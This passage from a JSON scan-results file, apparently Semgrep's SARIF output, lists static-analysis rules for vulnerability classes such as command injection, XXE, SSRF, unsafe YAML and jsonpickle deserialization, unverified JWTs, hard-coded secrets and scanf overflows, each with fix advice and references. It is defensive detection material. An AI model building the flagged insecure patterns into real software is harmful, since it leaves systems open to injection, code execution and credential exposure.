of Code ('Code Injection')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.sequelize.security.audit.sequelize-tls-disabled-cert-validation.sequelize-tls-disabled-cert-validation"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected subprocess function '$LOOP.subprocess_exec' with argument tainted by `event` object. If this data can be controlled by a malicious actor, it may be an instance of command injection. Audit the use of this call to ensure it is not controllable by an external resource. You may consider using 'shlex.escape()'."},"help":{"markdown":"Detected subprocess function '$LOOP.subprocess_exec' with argument tainted by `event` object. If this data can be controlled by a malicious actor, it may be an instance of command injection. Audit the use of this call to ensure it is not controllable by an external resource. You may consider using 'shlex.escape()'.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.aws-lambda.security.dangerous-asyncio-exec.dangerous-asyncio-exec)\n - [https://docs.python.org/3/library/asyncio-eventloop.html#asyncio.loop.subprocess_exec](https://docs.python.org/3/library/asyncio-eventloop.html#asyncio.loop.subprocess_exec)\n - [https://docs.python.org/3/library/shlex.html](https://docs.python.org/3/library/shlex.html)\n","text":"Detected subprocess function '$LOOP.subprocess_exec' with argument tainted by `event` object. If this data can be controlled by a malicious actor, it may be an instance of command injection. Audit the use of this call to ensure it is not controllable by an external resource. You may consider using 'shlex.escape()'."},"helpUri":"https://semgrep.dev/r/python.aws-lambda.security.dangerous-asyncio-exec.dangerous-asyncio-exec","id":"python.aws-lambda.security.dangerous-asyncio-exec.dangerous-asyncio-exec","name":"python.aws-lambda.security.dangerous-asyncio-exec.dangerous-asyncio-exec","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.aws-lambda.security.dangerous-asyncio-exec.dangerous-asyncio-exec"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The current configuration allows for XXE attacks through parameter entities. It is our recommendation to secure this parser against XXE attacks by configuring $PARSER with `$PARSER.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks with parameter entities. `$PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$PARSER.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The current configuration allows for XXE attacks through parameter entities. It is our recommendation to secure this parser against XXE attacks by configuring $PARSER with `$PARSER.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks with parameter entities. `$PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$PARSER.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.xxe.saxbuilder-xxe-parameter-entities.saxbuilder-xxe-parameter-entities)\n - [https://blog.sonarsource.com/secure-xml-processor/](https://blog.sonarsource.com/secure-xml-processor/)\n - [https://blog.sonarsource.com/understanding-xxe-vulnerabilities/](https://blog.sonarsource.com/understanding-xxe-vulnerabilities/)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E)\n - [https://github.com/returntocorp/java-xxe-research](https://github.com/returntocorp/java-xxe-research)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n - [https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755](https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The current configuration allows for XXE attacks through parameter entities. It is our recommendation to secure this parser against XXE attacks by configuring $PARSER with `$PARSER.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks with parameter entities. `$PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$PARSER.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"helpUri":"https://semgrep.dev/r/kotlin.xxe.saxbuilder-xxe-parameter-entities.saxbuilder-xxe-parameter-entities","id":"kotlin.xxe.saxbuilder-xxe-parameter-entities.saxbuilder-xxe-parameter-entities","name":"kotlin.xxe.saxbuilder-xxe-parameter-entities.saxbuilder-xxe-parameter-entities","properties":{"precision":"very-high","tags":["CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')","MEDIUM CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.xxe.saxbuilder-xxe-parameter-entities.saxbuilder-xxe-parameter-entities"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Checks for attempts to connect through telnet. This is insecure as the telnet protocol supports no encryption, and data passes through unencrypted."},"help":{"markdown":"Checks for attempts to connect through telnet. This is insecure as the telnet protocol supports no encryption, and data passes through unencrypted.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/problem-based-packs.insecure-transport.java-stdlib.telnet-request.telnet-request)\n - [https://commons.apache.org/proper/commons-net/javadocs/api-3.6/org/apache/commons/net/telnet/TelnetClient.html](https://commons.apache.org/proper/commons-net/javadocs/api-3.6/org/apache/commons/net/telnet/TelnetClient.html)\n","text":"Checks for attempts to connect through telnet. This is insecure as the telnet protocol supports no encryption, and data passes through unencrypted."},"helpUri":"https://semgrep.dev/r/problem-based-packs.insecure-transport.java-stdlib.telnet-request.telnet-request","id":"problem-based-packs.insecure-transport.java-stdlib.telnet-request.telnet-request","name":"problem-based-packs.insecure-transport.java-stdlib.telnet-request.telnet-request","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: problem-based-packs.insecure-transport.java-stdlib.telnet-request.telnet-request"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected a possible YAML deserialization vulnerability. `yaml.unsafe_load`, `yaml.Loader`, `yaml.CLoader`, and `yaml.UnsafeLoader` are all known to be unsafe methods of deserializing YAML. An attacker with control over the YAML input could create special YAML input that allows the attacker to run arbitrary Python code. This would allow the attacker to steal files, download and install malware, or otherwise take over the machine. Use `yaml.safe_load` or `yaml.SafeLoader` instead."},"help":{"markdown":"Detected a possible YAML deserialization vulnerability. `yaml.unsafe_load`, `yaml.Loader`, `yaml.CLoader`, and `yaml.UnsafeLoader` are all known to be unsafe methods of deserializing YAML. An attacker with control over the YAML input could create special YAML input that allows the attacker to run arbitrary Python code. This would allow the attacker to steal files, download and install malware, or otherwise take over the machine. Use `yaml.safe_load` or `yaml.SafeLoader` instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.deserialization.avoid-pyyaml-load.avoid-pyyaml-load)\n - [https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation](https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation)\n - [https://nvd.nist.gov/vuln/detail/CVE-2017-18342](https://nvd.nist.gov/vuln/detail/CVE-2017-18342)\n","text":"Detected a possible YAML deserialization vulnerability. `yaml.unsafe_load`, `yaml.Loader`, `yaml.CLoader`, and `yaml.UnsafeLoader` are all known to be unsafe methods of deserializing YAML. An attacker with control over the YAML input could create special YAML input that allows the attacker to run arbitrary Python code. This would allow the attacker to steal files, download and install malware, or otherwise take over the machine. Use `yaml.safe_load` or `yaml.SafeLoader` instead."},"helpUri":"https://semgrep.dev/r/python.lang.security.deserialization.avoid-pyyaml-load.avoid-pyyaml-load","id":"python.lang.security.deserialization.avoid-pyyaml-load.avoid-pyyaml-load","name":"python.lang.security.deserialization.avoid-pyyaml-load.avoid-pyyaml-load","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","MEDIUM CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.deserialization.avoid-pyyaml-load.avoid-pyyaml-load"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected SQL statement that is tainted by `event` object. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized statements like so: `cursor.execute('SELECT * FROM projects WHERE status = %s', 'active')`"},"help":{"markdown":"Detected SQL statement that is tainted by `event` object. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized statements like so: `cursor.execute('SELECT * FROM projects WHERE status = %s', 'active')`\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.aws-lambda.security.pymssql-sqli.pymssql-sqli)\n - [https://pypi.org/project/pymssql/](https://pypi.org/project/pymssql/)\n","text":"Detected SQL statement that is tainted by `event` object. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized statements like so: `cursor.execute('SELECT * FROM projects WHERE status = %s', 'active')`"},"helpUri":"https://semgrep.dev/r/python.aws-lambda.security.pymssql-sqli.pymssql-sqli","id":"python.aws-lambda.security.pymssql-sqli.pymssql-sqli","name":"python.aws-lambda.security.pymssql-sqli.pymssql-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.aws-lambda.security.pymssql-sqli.pymssql-sqli"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. PyYAML's `yaml` module is as powerful as `pickle` and so may call auny Python function. It is recommended to secure your application by using `yaml.SafeLoader` or `yaml.CSafeLoader`."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. PyYAML's `yaml` module is as powerful as `pickle` and so may call auny Python function. It is recommended to secure your application by using `yaml.SafeLoader` or `yaml.CSafeLoader`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.deserialization.tainted-pyyaml-fastapi.tainted-pyyaml-fastapi)\n - [https://cwe.mitre.org/data/definitions/502.html](https://cwe.mitre.org/data/definitions/502.html)\n - [https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation](https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://nvd.nist.gov/vuln/detail/CVE-2017-18342](https://nvd.nist.gov/vuln/detail/CVE-2017-18342)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. PyYAML's `yaml` module is as powerful as `pickle` and so may call auny Python function. It is recommended to secure your application by using `yaml.SafeLoader` or `yaml.CSafeLoader`."},"helpUri":"https://semgrep.dev/r/python.fastapi.deserialization.tainted-pyyaml-fastapi.tainted-pyyaml-fastapi","id":"python.fastapi.deserialization.tainted-pyyaml-fastapi.tainted-pyyaml-fastapi","name":"python.fastapi.deserialization.tainted-pyyaml-fastapi.tainted-pyyaml-fastapi","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.deserialization.tainted-pyyaml-fastapi.tainted-pyyaml-fastapi"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"User data flows into the host portion of this manually-constructed URL. This could allow an attacker to send data to their own server, potentially exposing sensitive data such as cookies or authorization information sent with this request. They could also probe internal servers or other resources that the server running this code can access. (This is called server-side request forgery, or SSRF.) Do not allow arbitrary hosts. Instead, create an allowlist for approved hosts, or hardcode the correct host."},"help":{"markdown":"User data flows into the host portion of this manually-constructed URL. This could allow an attacker to send data to their own server, potentially exposing sensitive data such as cookies or authorization information sent with this request. They could also probe internal servers or other resources that the server running this code can access. (This is called server-side request forgery, or SSRF.) Do not allow arbitrary hosts. Instead, create an allowlist for approved hosts, or hardcode the correct host.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.security.injection.tainted-url-host.tainted-url-host)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html)\n","text":"User data flows into the host portion of this manually-constructed URL. This could allow an attacker to send data to their own server, potentially exposing sensitive data such as cookies or authorization information sent with this request. They could also probe internal servers or other resources that the server running this code can access. (This is called server-side request forgery, or SSRF.) Do not allow arbitrary hosts. Instead, create an allowlist for approved hosts, or hardcode the correct host."},"helpUri":"https://semgrep.dev/r/python.django.security.injection.tainted-url-host.tainted-url-host","id":"python.django.security.injection.tainted-url-host.tainted-url-host","name":"python.django.security.injection.tainted-url-host.tainted-url-host","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","LOW CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.security.injection.tainted-url-host.tainted-url-host"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Found that the setting for providing detailed exception reports in Rails is set to true. This can lead to information exposure, where sensitive system or internal information is displayed to the end user. Instead, turn this setting off."},"help":{"markdown":"Found that the setting for providing detailed exception reports in Rails is set to true. This can lead to information exposure, where sensitive system or internal information is displayed to the end user. Instead, turn this setting off.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.rails.security.audit.detailed-exceptions.detailed-exceptions)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n","text":"Found that the setting for providing detailed exception reports in Rails is set to true. This can lead to information exposure, where sensitive system or internal information is displayed to the end user. Instead, turn this setting off."},"helpUri":"https://semgrep.dev/r/ruby.rails.security.audit.detailed-exceptions.detailed-exceptions","id":"ruby.rails.security.audit.detailed-exceptions.detailed-exceptions","name":"ruby.rails.security.audit.detailed-exceptions.detailed-exceptions","properties":{"precision":"very-high","tags":["CWE-200: Exposure of Sensitive Information to an Unauthorized Actor","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.rails.security.audit.detailed-exceptions.detailed-exceptions"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Avoid using `jsonpickle`, which is known to lead to code execution vulnerabilities. When unpickling, the serialized data could be manipulated to run arbitrary code. Instead, consider serializing the relevant data using `json` module."},"help":{"markdown":"Avoid using `jsonpickle`, which is known to lead to code execution vulnerabilities. When unpickling, the serialized data could be manipulated to run arbitrary code. Instead, consider serializing the relevant data using `json` module.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.deserialization.avoid-jsonpickle.avoid-jsonpickle)\n - [https://github.com/jsonpickle/jsonpickle#jsonpickle](https://github.com/jsonpickle/jsonpickle#jsonpickle)\n - [https://www.exploit-db.com/exploits/49585](https://www.exploit-db.com/exploits/49585)\n","text":"Avoid using `jsonpickle`, which is known to lead to code execution vulnerabilities. When unpickling, the serialized data could be manipulated to run arbitrary code. Instead, consider serializing the relevant data using `json` module."},"helpUri":"https://semgrep.dev/r/python.lang.security.deserialization.avoid-jsonpickle.avoid-jsonpickle","id":"python.lang.security.deserialization.avoid-jsonpickle.avoid-jsonpickle","name":"python.lang.security.deserialization.avoid-jsonpickle.avoid-jsonpickle","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","LOW CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.deserialization.avoid-jsonpickle.avoid-jsonpickle"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected JWT token decoded with 'verify=False'. This bypasses any integrity checks for the token which means the token could be tampered with by malicious actors. Ensure that the JWT token is verified."},"help":{"markdown":"Detected JWT token decoded with 'verify=False'. This bypasses any integrity checks for the token which means the token could be tampered with by malicious actors. Ensure that the JWT token is verified.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.jwt.security.unverified-jwt-decode.unverified-jwt-decode)\n - [https://github.com/we45/Vulnerable-Flask-App/blob/752ee16087c0bfb79073f68802d907569a1f0df7/app/app.py#L96](https://github.com/we45/Vulnerable-Flask-App/blob/752ee16087c0bfb79073f68802d907569a1f0df7/app/app.py#L96)\n","text":"Detected JWT token decoded with 'verify=False'. This bypasses any integrity checks for the token which means the token could be tampered with by malicious actors. Ensure that the JWT token is verified."},"helpUri":"https://semgrep.dev/r/python.jwt.security.unverified-jwt-decode.unverified-jwt-decode","id":"python.jwt.security.unverified-jwt-decode.unverified-jwt-decode","name":"python.jwt.security.unverified-jwt-decode.unverified-jwt-decode","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","MEDIUM CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.jwt.security.unverified-jwt-decode.unverified-jwt-decode"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected SHA1 hash algorithm which is considered insecure. SHA1 is not collision resistant and is therefore not suitable as a cryptographic signature. Use SHA256 or SHA3 instead."},"help":{"markdown":"Detected SHA1 hash algorithm which is considered insecure. SHA1 is not collision resistant and is therefore not suitable as a cryptographic signature. Use SHA256 or SHA3 instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.insecure-hash-algorithms.insecure-hash-algorithm-sha1)\n - [https://www.schneier.com/blog/archives/2012/10/when_will_we_se.html](https://www.schneier.com/blog/archives/2012/10/when_will_we_se.html)\n - [https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/sha-1-collision-signals-the-end-of-the-algorithm-s-viability](https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/sha-1-collision-signals-the-end-of-the-algorithm-s-viability)\n - [http://2012.sharcs.org/slides/stevens.pdf](http://2012.sharcs.org/slides/stevens.pdf)\n - [https://pycryptodome.readthedocs.io/en/latest/src/hash/sha3_256.html](https://pycryptodome.readthedocs.io/en/latest/src/hash/sha3_256.html)\n","text":"Detected SHA1 hash algorithm which is considered insecure. SHA1 is not collision resistant and is therefore not suitable as a cryptographic signature. Use SHA256 or SHA3 instead."},"helpUri":"https://semgrep.dev/r/python.lang.security.insecure-hash-algorithms.insecure-hash-algorithm-sha1","id":"python.lang.security.insecure-hash-algorithms.insecure-hash-algorithm-sha1","name":"python.lang.security.insecure-hash-algorithms.insecure-hash-algorithm-sha1","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.insecure-hash-algorithms.insecure-hash-algorithm-sha1"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"If unverified user data can reach the `evaluate` method it can result in Server-Side Request Forgery vulnerabilities"},"help":{"markdown":"If unverified user data can reach the `evaluate` method it can result in Server-Side Request Forgery vulnerabilities\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.playwright.security.audit.playwright-evaluate-arg-injection.playwright-evaluate-arg-injection)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"If unverified user data can reach the `evaluate` method it can result in Server-Side Request Forgery vulnerabilities"},"helpUri":"https://semgrep.dev/r/javascript.playwright.security.audit.playwright-evaluate-arg-injection.playwright-evaluate-arg-injection","id":"javascript.playwright.security.audit.playwright-evaluate-arg-injection.playwright-evaluate-arg-injection","name":"javascript.playwright.security.audit.playwright-evaluate-arg-injection.playwright-evaluate-arg-injection","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","LOW CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.playwright.security.audit.playwright-evaluate-arg-injection.playwright-evaluate-arg-injection"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Initialization Vectors (IVs) for block ciphers should be randomly generated each time they are used. Using a static IV means the same plaintext encrypts to the same ciphertext every time, weakening the strength of the encryption."},"help":{"markdown":"Initialization Vectors (IVs) for block ciphers should be randomly generated each time they are used. Using a static IV means the same plaintext encrypts to the same ciphertext every time, weakening the strength of the encryption.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.commoncrypto.hardcoded-iv.hardcoded-iv)\n - [https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements](https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements)\n","text":"Initialization Vectors (IVs) for block ciphers should be randomly generated each time they are used. Using a static IV means the same plaintext encrypts to the same ciphertext every time, weakening the strength of the encryption."},"helpUri":"https://semgrep.dev/r/swift.commoncrypto.hardcoded-iv.hardcoded-iv","id":"swift.commoncrypto.hardcoded-iv.hardcoded-iv","name":"swift.commoncrypto.hardcoded-iv.hardcoded-iv","properties":{"precision":"very-high","tags":["CWE-329: Not using a random initialization Vector (IV) with Cipher Block Chaining (CBC) Mode causes algorithms to be susceptible to dictionary attacks.","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","security"]},"shortDescription":{"text":"Semgrep Finding: swift.commoncrypto.hardcoded-iv.hardcoded-iv"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.axios.hardcoded-basic-token.hardcoded-basic-token)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/javascript.axios.hardcoded-basic-token.hardcoded-basic-token","id":"javascript.axios.hardcoded-basic-token.hardcoded-basic-token","name":"javascript.axios.hardcoded-basic-token.hardcoded-basic-token","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.axios.hardcoded-basic-token.hardcoded-basic-token"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Private Key detected. This is a sensitive credential and should not be hardcoded here. Instead, store this in a separate, private file."},"help":{"markdown":"Private Key detected. This is a sensitive credential and should not be hardcoded here. Instead, store this in a separate, private file.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-private-key.detected-private-key)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"Private Key detected. This is a sensitive credential and should not be hardcoded here. Instead, store this in a separate, private file."},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-private-key.detected-private-key","id":"generic.secrets.security.detected-private-key.detected-private-key","name":"generic.secrets.security.detected-private-key.detected-private-key","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-private-key.detected-private-key"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Avoid using 'scanf()'. This function, when used improperly, does not consider buffer boundaries and can lead to buffer overflows. Use 'fgets()' instead for reading input."},"help":{"markdown":"Avoid using 'scanf()'. This function, when used improperly, does not consider buffer boundaries and can lead to buffer overflows. Use 'fgets()' instead for reading input.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/c.lang.security.insecure-use-scanf-fn.insecure-use-scanf-fn)\n - [http://sekrit.de/webdocs/c/beginners-guide-away-from-scanf.html](http://sekrit.de/webdocs/c/beginners-guide-away-from-scanf.html)\n","text":"Avoid using 'scanf()'. This function, when used improperly, does not consider buffer boundaries and can lead to buffer overflows. Use 'fgets()' instead for reading input."},"helpUri":"https://semgrep.dev/r/c.lang.security.insecure-use-scanf-fn.insecure-use-scanf-fn","id":"c.lang.security.insecure-use-scanf-fn.insecure-use-scanf-fn","name":"c.lang.security.insecure-use-scanf-fn.insecure-use-scanf-fn","properties":{"precision":"very-high","tags":["CWE-676: Use of Potentially Dangerous Function","LOW CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: 